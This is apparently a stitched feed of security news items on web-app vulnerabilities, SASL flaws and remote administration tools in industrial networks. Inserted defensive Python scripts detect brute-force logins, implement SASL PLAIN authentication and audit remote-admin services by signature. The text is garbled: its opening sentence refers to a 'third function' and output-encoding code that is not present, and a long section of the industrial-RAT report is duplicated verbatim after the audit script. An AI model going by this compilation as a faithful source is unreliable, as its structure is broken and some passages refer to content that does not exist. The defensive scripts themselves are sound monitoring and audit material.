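The point the report makes about secure development practice shows up in the third function: output encoding is context-specific, and a code audit that only looks for missing `escape` calls will miss the URL and attribute cases.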

App Security Lags Despite Increasing Awareness

“Web application security is still poor and, despite increasing awareness of the risks, is still not being prioritized enough in the development process,” said Leigh-Anne Galloway, Positive Technologies cybersecurity resilience lead, as quoted in Infosecurity Magazine. “Most of these issues could have been prevented entirely by implementing secure development practices, including code audits from the start and throughout.”

Why is web app security falling behind? In a blog post for Secure Code Warrior, Pieter Danhieux blamed human behavior, stating that not only do humans behave in ways that introduce vulnerabilities and security threats, but developers aren’t always brought into the security loop.

“How are developers supposed to write secure code if nobody ever teaches them about why it’s important, the consequences of insecure code, and most importantly, how to prevent writing these vulnerabilities in their respective programming frameworks in the first place?” he wrote.

How Cybercriminals Exploit Web Applications to Spread Malware

The Positive Technologies report cited two primary areas of motivation for cybercriminals to take advantage of web application vulnerabilities. The first is to use apps to infect and spread malware throughout enterprise networks.

“This method was used to spread the Bad Rabbit ransomware: attackers compromised web applications belonging to media outlets and masked malware as an Adobe Flash Player update installer,” the report explained.

In another case, an attacker exploited a vulnerability to disseminate phishing emails targeting bank employees.

Some threats don’t even involve direct attacks against web apps; cybercriminals can use applications in various ways to launch malware attacks. The moment your website or web application is compromised — no matter the method — your organization’s reputation takes a hit, which can lead to financial loss.

Data Theft in a Regulated World

The report also cited data theft as a key motivation for targeting web applications. Data leakage is a problem in any situation, be it customer data or corporate intellectual property. However, the stakes of stolen data have been raised in a post-General Data Protection Regulation (GDPR) and a pre-California Consumer Privacy Act (CCPA) world.

As more states decide to step up measures to protect customer data, any type of data loss can create extraordinary headaches for company leaders. Loss of data can cost an organization hundreds of thousands to millions of dollars in fines, according to data compiled by TermsFeed. At the same time, as more effort is put into data protection, stolen data will become more valuable on the dark web, encouraging threat actors to improve their targeting and attack styles.

How Can Companies Protect Web Applications?

Data privacy regulations require most companies to improve their web application security capabilities. IT leaders can start by building security measures directly into the app’s design as a way to put consumer security and privacy front and center.

“For application security, this means that security and privacy need to be thought about in the planning stages of the Software Development Life Cycle (SDLC),” cybersecurity expert Amit Ashbel wrote for ITProPortal. “Unfortunately, this is not currently the case with many organizations so this will be a large task for the industry.”

Built-in security and privacy measures are crucial. Web app developers should also implement a web application firewall, bolster password management, deploy mobile application management features and install security plugins where available.

As the Positive Technologies report pointed out, it is clear that security issues in web applications aren’t getting the attention they require, because their annual studies are finding the same mistakes and concerns repeating themselves. Lax security may have been overlooked in the past, but as privacy regulations and their consequences gain traction, application vulnerabilities and data leakage can cost your organization more than just a light fine and a slap on the wrist.

Read the IBM e-guide: 5 Steps to Achieve Risk-based Application Security Management

The post Your Web Applications Are More Vulnerable Than You Think appeared first on Security Intelligence.

Women in Information Security: Sharka

Due to popular demand, my women in information security interview series is back for autumn! This marks the second anniversary since I started. Some of my subjects in this round have been waiting since last spring, so getting to chat with them has been long overdue. Let’s start with Sharka, a penetration tester who is […]

The post Women in Information Security: Sharka appeared first on The State of Security.

The MyCloud Auth Vulnerability Fixed by Western Digital with a Hotfix

Western Digital have just released a hotfix as part of a firmware update to resolve the authentication bypass vulnerability (CVE-2018-17153)

The MyCloud Auth Vulnerability Fixed by Western Digital with a Hotfix on Latest Hacking News.

Cisco Patched Critical Vulnerability In Its Video Surveillance Manager Software

Recently, Cisco discovered a critical vulnerability in its Video Surveillance Manager during an internal security review. The vulnerability could allow

Cisco Patched Critical Vulnerability In Its Video Surveillance Manager Software on Latest Hacking News.

Cisco Patched Multiple Critical RCE Flaws in Webex Network Recording Player

Cisco has recently patched multiple vulnerabilities in the Webex Network Recording Player. Thanks to researchers from Trend Micro Zero Day

Cisco Patched Multiple Critical RCE Flaws in Webex Network Recording Player on Latest Hacking News.

Zero-Day Windows Jet Database Vulnerability Could Allow Remote Attacks

Researchers have discovered a zero-day vulnerability in the Microsoft Jet Database Engine that allows remote hacking of Windows systems. While

Zero-Day Windows Jet Database Vulnerability Could Allow Remote Attacks on Latest Hacking News.

Bitcoin Core Bug Could Crash The Entire Bitcoin Network

Nobody knew that the currency of the future was on the verge of collapse until the developers patched a critical

Bitcoin Core Bug Could Crash The Entire Bitcoin Network on Latest Hacking News.

Simple Authentication and Security Layer (SASL) vulnerabilities

Simple Authentication and Security Layer (SASL) is an authentication layer used in Internet protocols. SASL is not a protocol, but rather a framework that provides developers of applications and shared libraries with mechanisms for authentication, data integrity–checking, and encryption.

Within the framework and a few of its plugins, there are a couple of known vulnerabilities that we want to make you aware of. Although patches have been issued, not everyone has implemented them.

Why would I need to know about SASL?

Most server administrators will recognize the acronym from this type of error message or report:

“SASL LOGIN authentication failed: authentication failure”

Usually the message will contain more details about the failure, depending on the specific software and plugins that you are using. While receiving such a message in itself is not a reason for alarm, if you see it repeatedly and originating from the same IP address, then there is reason to investigate further. Possibly someone is trying to gain access to your server and planning to use it as a spam-box. They might be looking for a way to use your server and your resources to send out a spam campaign.

Countermeasures against brute force attacks

SASL attacks usually turn out to be brute force attacks, meaning an automated script or a bot is trying over and over to log into an existing email account on your server, trying many combinations of credentials to find a valid username and password pair. Thankfully, there are some countermeasures you can take against these attacks.

  • If you have the option to make your server listen on a different port, doing so might make you a less likely target for new attacks.
  • If the SASL message is from the same IP all the time, block that IP in your firewall.
  • If the attackers keep coming at you from different IPs, there are software solutions that use machine learning to automatically block any new assailant. One caveat to this solution: Be vigilant about false positives so that you don’t shut out legitimate users, such as remote employees.

If you are seeing some of these attacks, there is no reason to feel singled out. There are threat actors out there that constantly sweep the Internet for new servers listening on port 25.
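The countermeasures above start with noticing the pattern in your own logs. The following script is an added example, not code from the Malwarebytes article: it parses Postfix-style "SASL … authentication failed" lines, counts failures per client IP inside a sliding time window, and reports the sources that cross a threshold so that one address hammering the server stands out while a remote employee mistyping a password twice does not. The log lines, the threshold and the `allow` set are constructed for the demo.

```python
"""Detect SASL brute-force sources in a mail log (added example, not from the article).

Counts 'SASL ... authentication failed' lines per client IP inside a sliding
time window, so that a burst from one address stands out while a handful of
mistyped passwords from a remote employee does not.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed Postfix-style log lines for the demo; the addresses are
# documentation ranges (RFC 5737), not real hosts.
SAMPLE_LOG = """\
Oct  5 10:01:02 mx1 postfix/smtpd[2201]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure
Oct  5 10:01:05 mx1 postfix/smtpd[2201]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure
Oct  5 10:01:09 mx1 postfix/smtpd[2203]: warning: unknown[203.0.113.7]: SASL PLAIN authentication failed: authentication failure
Oct  5 10:01:15 mx1 postfix/smtpd[2203]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure
Oct  5 10:01:20 mx1 postfix/smtpd[2204]: warning: unknown[203.0.113.7]: SASL LOGIN authentication failed: authentication failure
Oct  5 10:02:00 mx1 postfix/smtpd[2205]: warning: unknown[198.51.100.9]: SASL LOGIN authentication failed: authentication failure
Oct  5 10:45:00 mx1 postfix/smtpd[2206]: warning: unknown[198.51.100.9]: SASL LOGIN authentication failed: authentication failure
Oct  5 10:03:11 mx1 postfix/smtpd[2207]: connect from mail.example.net[192.0.2.10]
"""

# syslog timestamp, host, program[pid]:, then the Postfix SASL warning
FAIL_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ \S+: warning: "
    r"\S+\[(?P<ip>[0-9a-fA-F.:]+)\]: SASL (?P<mech>\S+) authentication failed"
)


def parse_failures(log_text, year=2018):
    """Yield (timestamp, ip, mechanism) for every SASL failure line."""
    for line in log_text.splitlines():
        m = FAIL_RE.match(line)
        if not m:
            continue
        stamp = " ".join(m["ts"].split())  # collapse syslog's padded day field
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        yield ts, m["ip"], m["mech"]


def failures_per_ip(log_text):
    """Total failure count per source IP, regardless of timing."""
    counts = defaultdict(int)
    for _, ip, _ in parse_failures(log_text):
        counts[ip] += 1
    return dict(counts)


def brute_force_sources(log_text, threshold=5, window_seconds=600, allow=()):
    """Return {ip: peak failures inside one window} for sources that reach the threshold.

    `allow` lists addresses that must never be flagged (for example the VPN
    egress used by remote staff); this is the false-positive guard the text
    warns about when automated blocking is in play.
    """
    recent = defaultdict(deque)  # per-IP timestamps still inside the window
    flagged = {}
    for ts, ip, _ in sorted(parse_failures(log_text)):
        if ip in allow:
            continue
        window = recent[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(window))
    return flagged


if __name__ == "__main__":
    for ip, n in brute_force_sources(SAMPLE_LOG).items():
        print(f"{ip}: {n} failures within 10 min, candidate for a firewall block")
```

Feed it `/var/log/mail.log` (or the journal output) and the flagged addresses are the ones worth a firewall rule; the two isolated failures from the second address fall below the threshold and are left alone.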

SASL framework

SASL is a framework for application protocols, such as SMTP or IMAP, that adds authentication support. It checks whether the user has the proper permissions to use the server in the way they request. It also offers a framework for data integrity–checking and encryption.

For a better understanding of how the framework actually works and where the vulnerabilities throw a wrench in the process, we want to give you some background about the flow of information between server and clients.

The following figure shows the basic SASL architecture:

(Figure: SASL architecture)

Client and server applications make calls to their local copies of the SASL library, or libsasl, through the SASL API. The libsasl then communicates with the SASL mechanisms through the SASL service provider interface (SPI).

The following diagram shows steps in the SASL life cycle. The client actions are shown on the left and the server actions on the right. The arrows in the middle show interactions between the client and server over an external connection.

(Figure: SASL communication flowchart)
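To make the life cycle concrete, here is an added example (not from the article, and not any real libsasl code) that walks one SMTP AUTH exchange using the PLAIN mechanism from RFC 4616: the server advertises its mechanisms, the client answers with the base64 message `[authzid] NUL authcid NUL passwd`, and the server parses it, verifies the credential against a salted PBKDF2 record, and checks whether the authentication identity may act as the requested authorization identity. The user store, the iteration count and the reply strings are constructed for the demo. It also shows the two paths the vulnerabilities above land on: a malformed or aborted response must be rejected cleanly rather than crash or leak.

```python
"""One SASL PLAIN exchange, client and server side (added example, not the article's code)."""
import base64
import hashlib
import hmac
import os

NUL = b"\x00"
PBKDF2_ROUNDS = 100_000  # constructed choice for the demo


def plain_initial_response(authcid, password, authzid=""):
    """Client side: build the RFC 4616 PLAIN message and base64 it for SMTP AUTH."""
    msg = authzid.encode() + NUL + authcid.encode() + NUL + password.encode()
    return base64.b64encode(msg).decode()


def parse_plain(b64):
    """Server side: decode and split the PLAIN message, rejecting anything malformed."""
    raw = base64.b64decode(b64, validate=True)  # raises ValueError on bad base64
    parts = raw.split(NUL)
    if len(parts) != 3:
        raise ValueError("PLAIN message must have exactly three NUL-separated fields")
    authzid, authcid, passwd = (p.decode("utf-8") for p in parts)
    if not authcid or not passwd:
        raise ValueError("authcid and password must be non-empty")
    return authzid, authcid, passwd


def make_record(password, salt=None):
    """Constructed credential store entry: (salt, PBKDF2-HMAC-SHA256 hash)."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


USERS = {"alice": make_record("correct horse battery")}  # constructed sample user


class SaslServer:
    """Minimal server-side state machine for the PLAIN mechanism."""

    MECHS = ("PLAIN",)

    def advertise(self, tls_active):
        # PLAIN carries the password in the clear, so it is only offered under TLS.
        return "AUTH " + " ".join(self.MECHS) if tls_active else ""

    def authenticate(self, mech, response):
        if mech not in self.MECHS:
            return "504 mechanism not supported"
        if response == "*":          # SASL abort from the client
            return "501 authentication aborted"
        try:
            authzid, authcid, passwd = parse_plain(response)
        except ValueError:
            return "501 malformed authentication response"
        rec = USERS.get(authcid)
        # Hash even for unknown users so timing does not reveal which names exist.
        salt = rec[0] if rec else b"\x00" * 16
        digest = hashlib.pbkdf2_hmac("sha256", passwd.encode(), salt, PBKDF2_ROUNDS)
        if rec is None or not hmac.compare_digest(digest, rec[1]):
            return "535 authentication failed"
        if authzid and authzid != authcid:  # no proxy authorization in this demo
            return "535 not authorized to act as " + authzid
        return "235 authenticated as " + authcid


if __name__ == "__main__":
    server = SaslServer()
    print(server.advertise(tls_active=True))
    print(server.authenticate("PLAIN", plain_initial_response("alice", "correct horse battery")))
    print(server.authenticate("PLAIN", plain_initial_response("alice", "wrong")))
    print(server.authenticate("PLAIN", "*"))
```

The interesting branches for a defender are the `501` ones: a crafted username that the parser cannot split cleanly, or a client that aborts mid-exchange, must leave the server in the same state as before the attempt. That is exactly where the Dovecot issues described below went wrong.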

Memcached vulnerability

Memcached is a software package that implements a high-performance caching server for storing chunks of data obtained from database and API calls in RAM. This helps speed up dynamic web applications, making it well suited for large websites and big-data projects.

In 2016, security researchers from Cisco’s Talos found three remote code execution vulnerabilities. All of these flaws affected memcached’s binary protocol for storing and retrieving data, and one of them was in the Simple Authentication and Security Layer (SASL) implementation. Memcached fixed these vulnerabilities later that year, but adoption of the fixed versions has been poor.

Dovecot server vulnerabilities

A Denial of Service vulnerability was found in the SASL authentication component of the Dovecot server. If the auth-policy component is enabled, a validation error in the handling of a crafted username during SASL authentication lets remote attackers crash vulnerable systems. The vulnerable versions were 2.2.25 through 2.2.26.1, and unfortunately some of these are still in active use.

Another flaw was found in Dovecot 2.0 up to 2.2.33 and 2.3.0. An abort of SASL authentication results in a memory leak in the Dovecot auth client used by login processes. The leak has an impact on high-performance configurations where the same login processes are reused and can cause the process to crash due to memory exhaustion.

More recent vulnerabilities

A more recent vulnerability was found in Apache Qpid Broker. Both the Qpid broker and Qpid clients use the Cyrus SASL library, a full-featured authentication framework that offers many configuration options. Authentication of incoming AMQP connections in Apache Qpid Broker-J is performed by special entities called “Authentication Providers.” Each Authentication Provider can support several SASL mechanisms, which are offered to connecting clients as part of the SASL negotiation process.

The vulnerability that was discovered is a Denial of Service vulnerability. It was found in Apache Qpid Broker-J 7.0.0 in the functionality for authenticating connections for AMQP protocols 0-8, 0-9, 0-91, and 0-10 when either the PLAIN or the XOAUTH2 SASL mechanism is used. The vulnerability allows an unauthenticated attacker to crash the Broker instance.

Update your software

As you can see, there are quite a few of these vulnerabilities still active, and I didn’t even touch on the older ones. In fact, there are a lot more older vulnerabilities than new ones, and I’m afraid that not all of them have been patched.

So we can’t say this enough, and we won’t stop telling you, either: Always make sure you are running the latest and patched version of the software you are using. This is especially true when talking about Internet-facing servers, and absolutely vital if one of their jobs is to keep your resources safe and secure. SASL is a vital authentication mechanism, in particular where many email servers are concerned.

Stay safe, everyone!


The figures in this article are courtesy of Oracle.

The post Simple Authentication and Security Layer (SASL) vulnerabilities appeared first on Malwarebytes Labs.

Adobe Addresses a Number of Critical Remote Execution Vulnerabilities

Adobe has addressed several vulnerabilities in Acrobat DC and Acrobat Reader DC by also including one of the several vulnerabilities

Adobe Addresses a Number of Critical Remote Execution Vulnerabilities on Latest Hacking News.

Authentication Bypass Vulnerability Disclosed in Western Digital My Cloud NAS Devices

Security Researchers at Securify have found an elevation of privilege vulnerability in the WD MyCloud platform which can be exploited by

Authentication Bypass Vulnerability Disclosed in Western Digital My Cloud NAS Devices on Latest Hacking News.

Threats posed by using RATs in ICS

While conducting audits, penetration tests and incident investigations, we have often come across legitimate remote administration tools (RAT) for PCs installed on operational technology (OT) networks of industrial enterprises. In a number of incidents that we have investigated, threat actors had used RATs to attack industrial organizations. In some cases, the attackers had stealthily installed RATs on victim organizations’ computers, while in other cases, they had been able to use the RATs that were installed in the organization at the time of the attacks. These observations prompted us to analyze the scope of the threat, including the incidence of RATs on industrial networks and the reasons for using them.

Methodology

The statistical data presented in this paper was collected using the Kaspersky Security Network (KSN) from ICS computers protected by Kaspersky Lab products that Kaspersky Lab ICS CERT categorizes as part of the industrial infrastructure at organizations. This group includes Windows computers that perform one or several of the following functions:

  • supervisory control and data acquisition (SCADA) servers;
  • data storage servers (Historian);
  • data gateways (OPC);
  • stationary workstations of engineers and operators;
  • mobile workstations of engineers and operators;
  • Human Machine Interface (HMI).

As part of our research, we considered and analyzed all popular RATs for Windows, with the exception of Remote Desktop, which is part of the Windows operating system. Our research into this RAT is ongoing and will be presented in the next paper of the series.

The use of RATs in ICS

According to KSN data, in the first half of 2018, legitimate RATs (programs categorized as not-a-virus: RemoteAdmin) were installed and used on one in three ICS computers.

Percentage of ICS computers that have RATs legitimately installed on them

The statistics support our observations: RATs are indeed often used on OT networks of industrial enterprises. We believe this could be due to attempts to reduce costs associated with maintaining ICS and minimize the response time in the event of malfunction.

As we were able to find out, remote access to computers on the OT network is not restricted to administrators and engineers inside the enterprise network’s perimeter. It can also be made available via the internet to users outside the enterprise network perimeter. Such users can include representatives of third-party enterprises – employees of system integrators or ICS vendors, who use RATs for diagnostics, maintenance and to address any ICS malfunctions. As our industrial network security audits have shown, such access is often poorly supervised by the enterprise’s responsible employees, while remote users connecting to the OT network often have excessive rights, such as local administrator privileges, which is obviously a serious issue in terms of ensuring the information security of industrial automation systems.

From interviews with engineers and operators of various industrial systems that we have audited, and based on an analysis of ICS user documentation, we have determined that RATs are most commonly used on industrial networks according to the following scenarios:

  1. To control/monitor HMI from an operator workstation (including displaying information on a large screen);
  2. To control/maintain HMI from an engineering workstation;
  3. To control SCADA from an operator workstation;
  4. To provide SCADA maintenance from an engineering workstation or a computer of a contractor/vendor (from an external network);
  5. To connect multiple operators to one operator workstation (thin client-like architecture used to save money on licenses for the software used on operator workstations);
  6. To connect to a computer on the office network from the OT network via HMI and perform various tasks on that computer (access email, access the internet, work with office documents, etc.).

Some of the scenarios listed above indicate that the use of RATs on the OT network can be explained by operational requirements, which means that giving up the use of RATs would unavoidably entail modifications to work processes. At the same time, it is important to realize that an attack on a poorly protected RAT could easily cause disruptions to the industrial process and any decisions on using RATs on the OT network should be made with this in mind. Tight controls on the use of RATs on the OT network would help to reduce the attack surface and the risk of infection for systems administered remotely.

TOP 20 countries by percentage of ICS computers on which RATs were used at least once during the first half of 2018 (to all ICS computers in each country)

Scenarios of RAT installation on ICS computers

According to our research, there are three most common scenarios of RAT installation on ICS computers:

  1. Installation of ICS software distribution packages that include RATs (using separate distribution packages or ICS software installers). RATs included in ICS software distribution packages make up 18.6% of all RATs we have identified on ICS computers protected by Kaspersky Lab products.

Percentage of RATs bundled with ICS products to all RATs found on ICS computers

  2. Deliberate installation of RATs by personnel or suppliers – network administrators, engineers, operators, or integrator companies. We do not undertake to judge whether these installations are legitimate. Based on our experience of industrial network audits and incident investigation, we can state that many such installations do not comply with the organization’s information security policy and some are installed without the knowledge of respective enterprises’ responsible employees.
  3. Stealthy installation of RATs by malware. An example of this is a recent attack that we have investigated (see below).

Threats associated with the use of RATs on industrial networks are not always obvious, nor are the reasons for which RATs are used.

Most of the RATs we have identified on industrial systems have the following characteristics that significantly reduce the security level of the host system:

  • Elevated privileges – the server part of a RAT is often executed as a service with system privileges, i.e., NT SYSTEM;
  • No support for restricting local access to the system / client activity;
  • Single-factor authentication;
  • No logging of client activity;
  • Vulnerabilities (our report on zero-day vulnerabilities identified in popular RAT systems that are used, among other applications, in products by many ICS vendors, will be published by the end of the year);
  • The use of relay servers (for reverse connections) that enable RATs to bypass NAT and firewall restrictions on the network perimeter.

The most critical RAT-related problem is the use of elevated privileges and the absence of any means to limit these privileges (or to restrict a remote user’s local access). In practice, this means that if attackers (or malware) gain access to a remote user’s computer, steal authentication data (login/password), hijack an active remote administration session or successfully attack a vulnerability in the RAT’s server part, they will gain unrestricted control of the ICS system. By using relay servers for reverse connections, attackers can also connect to these RATs from anywhere in the world.

There are also other issues that affect RATs built into ICS software distribution packages:

  • RAT components and distribution packages are rarely updated (even if new versions of ICS distribution packages are released). This makes them more likely to contain vulnerabilities;
  • In the vast majority of cases, the default password is used – it is either hardcoded into the RAT by the ICS software vendor or specified in the documentation as “recommended”.

RATs are legitimate software tools that are often used on industrial networks, which means it can be extremely difficult to distinguish attacks involving RATs from legitimate activity. In addition, since the information security service and other employees responsible for ICS security are often unaware that a RAT is installed, the configuration of RATs is in most cases not analyzed when auditing the security of an industrial network. This makes it particularly important to control by whom, when and for what purposes RATs are used on the industrial network and to ensure that it is completely impossible to use RATs without the knowledge of employees responsible for the OT network’s information security.

Attacks of threat actors involving RATs

Everything written above applies to potential threats associated with the use of RATs.

Based on our analysis of KSN statistics, we were able to identify a number of attacks and malware infection attempts involving RATs installed on ICS computers. In most cases, attacks were based on the following scenarios (in the descending order of attack incidence):

  1. A brute force network attack from the local network or the internet designed to crack logins/passwords;
  2. An attacker or malware using a RAT to download and execute malware using stolen or cracked authentication credentials;
  3. A remote user (probably a legitimate user deceived by attackers) using a RAT to download a Trojan to an ICS computer and then executing it; the Trojan can be disguised as an office document, non-industrial software (a game, multimedia software, etc.), a crack/keygen for office, application or industrial software, etc.;
  4. A network attack from the local network or the internet on the server part of the RAT using exploits.

Brute force type network attacks (designed to crack logins/passwords) are the most common: their implementation does not require any special knowledge or skills and the software used in such attacks is publicly available.

It cannot be determined based on available data who connects to a RAT’s server part installed on an ICS computer – a legitimate user, an attacker or malware – or why. Consequently, we can only guess whether this activity represents a targeted attack, sabotage attempts or a client’s error.

Network attacks from the internet were most probably conducted by threat actors using malware, penetration testing tools or botnets.

Network attacks from the local network could indicate the presence of attackers (possibly including an insider) on the network. Another possibility is that there is a compromised computer on the local network that is either infected with malware or is used by the attacker as a point of presence (if the authentication credentials were compromised earlier).

Attacks on industrial enterprises using RMS and TeamViewer

In the first half of 2018, Kaspersky Lab ICS CERT identified a new wave of phishing emails disguised as legitimate commercial offers. Although the attacks targeted primarily industrial companies within the territory of Russia, the same tactics and tools can be used in attacks on industrial companies in any country of the world.

The malware used in these attacks installs legitimate remote administration software on the system — TeamViewer or Remote Manipulator System/Remote Utilities (RMS). In both cases, a system DLL is replaced with a malicious library to inject malicious code into a legitimate program’s process. This provides the attackers with remote control of the infected systems. Various techniques are used to mask the infection and the activity of the software installed on the system.

If necessary, the attackers download an additional malware pack to the system, which is specifically tailored to the attack on each individual victim. This set of malware may contain spyware, additional remote administration tools that extend the threat actor’s control of infected systems, malware to exploit vulnerabilities in the operating system and application software, as well as the Mimikatz utility, which makes it possible to obtain account data for Windows accounts.

According to available data, the attackers’ main goal is to steal money from victim organizations’ accounts, but possible attack scenarios are not limited to the theft of funds. In the process of attacking their targets, the attackers steal sensitive data belonging to target organizations, their partners and customers, carry out surreptitious surveillance of the victim companies’ employees, and record audio and video using devices connected to infected machines. Clearly, on top of the financial losses, these attacks result in leaks of victim organizations’ sensitive data.

Multiple attacks on an auto manufacturer

A characteristic example of attacks based on the second scenario was provided by attacks on the industrial network of a motor vehicle manufacturing and service company, in particular, on computers designed to diagnose the engines and onboard systems of trucks and heavy-duty vehicles. Multiple attempts to conduct such attacks were blocked by Kaspersky Lab products.

A RAT was installed and intermittently used on at least one of the computers in the company’s industrial network. Starting in late 2017, numerous attempts to launch various malicious programs using the RAT were blocked on the computer. Infection attempts were made regularly over a period of several months – 2-3 times a week, at different times of the day. Based in part on other indirect indicators, we believe that RAT authentication data was compromised and used by attackers (or malware) to attack the enterprise’s computers over the internet.

After gaining access to the potential victim’s infrastructure via the RAT, the attackers kept trying to choose a malicious packer that would enable them to evade antivirus protection.

The blocked programs included modifications of the malware detected by Kaspersky Lab products as Net-Worm.Win32.Agent.pm. When launched, this worm immediately begins to proliferate on the local network using exploits for the MS17-010 vulnerabilities – the same ones that were published by ShadowBrokers in the spring of 2017 and were used in attacks by the infamous WannaCry and ExPetr cryptors.

The Nymaim Trojan family was also blocked. Representatives of this family are often used to download modifications of botnet agents from the Necus family, which in turn have often been used to infect computers with ransomware from the Locky family.

Conclusion

Remote administration tools are widely used on industrial networks for ICS monitoring, control and maintenance. The ability to manipulate the ICS remotely significantly reduces maintenance costs, but at the same time, uncontrolled remote access, the inability to provide 100% verification of the remote client’s legitimacy, and the vulnerabilities in RAT code and configuration significantly increase the attack surface. At the same time, RATs, along with other legitimate tools, are increasingly used by attackers to mask malicious activity and make attribution more difficult.

To reduce the risk of cyberattacks involving RATs, we recommend the following high-priority measures:

  • Audit the use of application and system remote administration tools on the industrial network, such as VNC, RDP, TeamViewer, and RMS / Remote Utilities. Remove all remote administration tools that are not required by the industrial process.
  • Conduct an audit and disable remote administration tools which came with ICS software (refer to the relevant software documentation for detailed instructions), provided that they are not required by the industrial process.
  • Closely monitor and log events for each remote control session required by the industrial process; remote access should be disabled by default and enabled only upon request and only for limited periods of time.
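The first two recommendations are an inventory problem: which remote administration tools are present, what account they run under, what they listen on, and whether the industrial process actually needs them. The script below is an added example, not Kaspersky Lab ICS CERT tooling; it takes a service inventory and a listening-socket inventory (both constructed here, in the shape `sc query`/`Get-Service` and `netstat -ano` would give after parsing) and scores each remote administration tool against the weak characteristics listed earlier in the article: running as SYSTEM, bound to every interface, and not on the list of tools the process requires. The tool signatures and default ports are assumptions drawn from vendor defaults, and the allowlist is a placeholder for what a site survey would produce.

```python
"""Audit remote administration tools on a Windows ICS host (added example, not the article's code).

Joins a service inventory with a listener inventory and flags each RAT
against the risk properties described in the text.
"""
from collections import defaultdict

# Constructed service inventory: (service name, image path, logon account, state)
SERVICES = [
    ("TeamViewer", r"C:\Program Files\TeamViewer\TeamViewer_Service.exe", "LocalSystem", "Running"),
    ("tvnserver", r"C:\Program Files\TightVNC\tvnserver.exe", "LocalSystem", "Running"),
    ("RManService", r"C:\Program Files\Remote Utilities - Host\rutserv.exe", "LocalSystem", "Running"),
    ("TermService", r"C:\Windows\System32\svchost.exe -k NetworkService", "NT AUTHORITY\\NetworkService", "Running"),
    ("ScadaHistorian", r"C:\ICS\historian.exe", "ICS\\svc_hist", "Running"),
]

# Constructed listener inventory: (local bind address, TCP port, owning service name)
LISTENERS = [
    ("0.0.0.0", 5900, "tvnserver"),
    ("0.0.0.0", 5650, "RManService"),
    ("127.0.0.1", 5938, "TeamViewer"),
    ("0.0.0.0", 3389, "TermService"),
]

# Placeholder allowlist: tools the industrial process genuinely depends on.
REQUIRED_BY_PROCESS = frozenset({"tvnserver"})

# (substring of lowercased service name or image path, tool label); assumptions
SIGNATURES = [
    ("teamviewer", "TeamViewer"),
    ("tvnserver", "VNC"),
    ("winvnc", "VNC"),
    ("vncserver", "VNC"),
    ("rutserv", "Remote Utilities / RMS"),
    ("termservice", "RDP"),
]
SYSTEM_ACCOUNTS = {"localsystem", "nt authority\\system"}
WILDCARD_BIND = {"0.0.0.0", "::"}


def identify_tool(service_name, image_path):
    """Return the tool label for a service, or None if it is not a known RAT."""
    haystack = f"{service_name} {image_path}".lower()
    for needle, label in SIGNATURES:
        if needle in haystack:
            return label
    return None


def audit_remote_admin(services, listeners, required=frozenset()):
    """Return one finding per detected RAT, worst first.

    Each finding lists the risk flags from the article that apply:
    elevated privileges, exposure on all interfaces, and lack of a
    documented operational need.
    """
    ports_by_service = defaultdict(list)
    for addr, port, svc in listeners:
        ports_by_service[svc].append((addr, port))

    findings = []
    for name, image, account, state in services:
        tool = identify_tool(name, image)
        if tool is None:
            continue
        flags = []
        if account.lower() in SYSTEM_ACCOUNTS:
            flags.append("runs as SYSTEM")
        if any(addr in WILDCARD_BIND for addr, _ in ports_by_service[name]):
            flags.append("listens on all interfaces")
        if name not in required:
            flags.append("not required by the industrial process")
        findings.append({
            "service": name,
            "tool": tool,
            "state": state,
            "ports": sorted(port for _, port in ports_by_service[name]),
            "flags": flags,
        })
    findings.sort(key=lambda f: (-len(f["flags"]), f["service"]))
    return findings


if __name__ == "__main__":
    for f in audit_remote_admin(SERVICES, LISTENERS, REQUIRED_BY_PROCESS):
        print(f"{f['service']:<14} {f['tool']:<24} ports={f['ports']} {', '.join(f['flags'])}")
```

On real hosts the two inventories would come from the service control manager and the socket table rather than literals, but the scoring stays the same: a tool with all three flags is the one to remove or lock down first, and a tool on the allowlist still shows up so its privileges and bind address can be reviewed.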

  4. A network attack from the local network or the internet on the server part of the RAT using exploits.

Brute force type network attacks (designed to crack logins/passwords) are the most common: their implementation does not require any special knowledge or skills and the software used in such attacks is publicly available.

It cannot be determined based on available data who connects to a RAT’s server part installed on an ICS computer – a legitimate user, an attacker or malware – or why. Consequently, we can only guess whether this activity represents a targeted attack, sabotage attempts or a client’s error.

Network attacks from the internet were most probably conducted by threat actors using malware, penetration testing tools or botnets.

Network attacks from the local network could indicate the presence of attackers (possibly including an insider) on the network. Another possibility is that there is a compromised computer on the local network that is either infected with malware or is used by the attacker as a point of presence (if the authentication credentials were compromised earlier).

Attacks on industrial enterprises using RMS and TeamViewer

In the first half of 2018, Kaspersky Lab ICS CERT identified a new wave of phishing emails disguised as legitimate commercial offers. Although the attacks targeted primarily industrial companies within the territory of Russia, the same tactics and tools can be used in attacks on industrial companies in any country of the world.

The malware used in these attacks installs legitimate remote administration software on the system — TeamViewer or Remote Manipulator System/Remote Utilities (RMS). In both cases, a system DLL is replaced with a malicious library to inject malicious code into a legitimate program’s process. This provides the attackers with remote control of the infected systems. Various techniques are used to mask the infection and the activity of the software installed on the system.

If necessary, the attackers download an additional malware pack to the system, which is specifically tailored to the attack on each individual victim. This set of malware may contain spyware, additional remote administration tools that extend the threat actor’s control of infected systems, malware to exploit vulnerabilities in the operating system and application software, as well as the Mimikatz utility, which makes it possible to obtain account data for Windows accounts.

According to available data, the attackers’ main goal is to steal money from victim organizations’ accounts, but possible attack scenarios are not limited to the theft of funds. In the process of attacking their targets, the attackers steal sensitive data belonging to target organizations, their partners and customers, carry out surreptitious surveillance of the victim companies’ employees, and record audio and video using devices connected to infected machines. Clearly, on top of the financial losses, these attacks result in leaks of victim organizations’ sensitive data.

Multiple attacks on an auto manufacturer

A characteristic example of attacks based on the second scenario was provided by attacks on the industrial network of a motor vehicle manufacturing and service company, in particular, on computers designed to diagnose the engines and onboard systems of trucks and heavy-duty vehicles. Multiple attempts to conduct such attacks were blocked by Kaspersky Lab products.

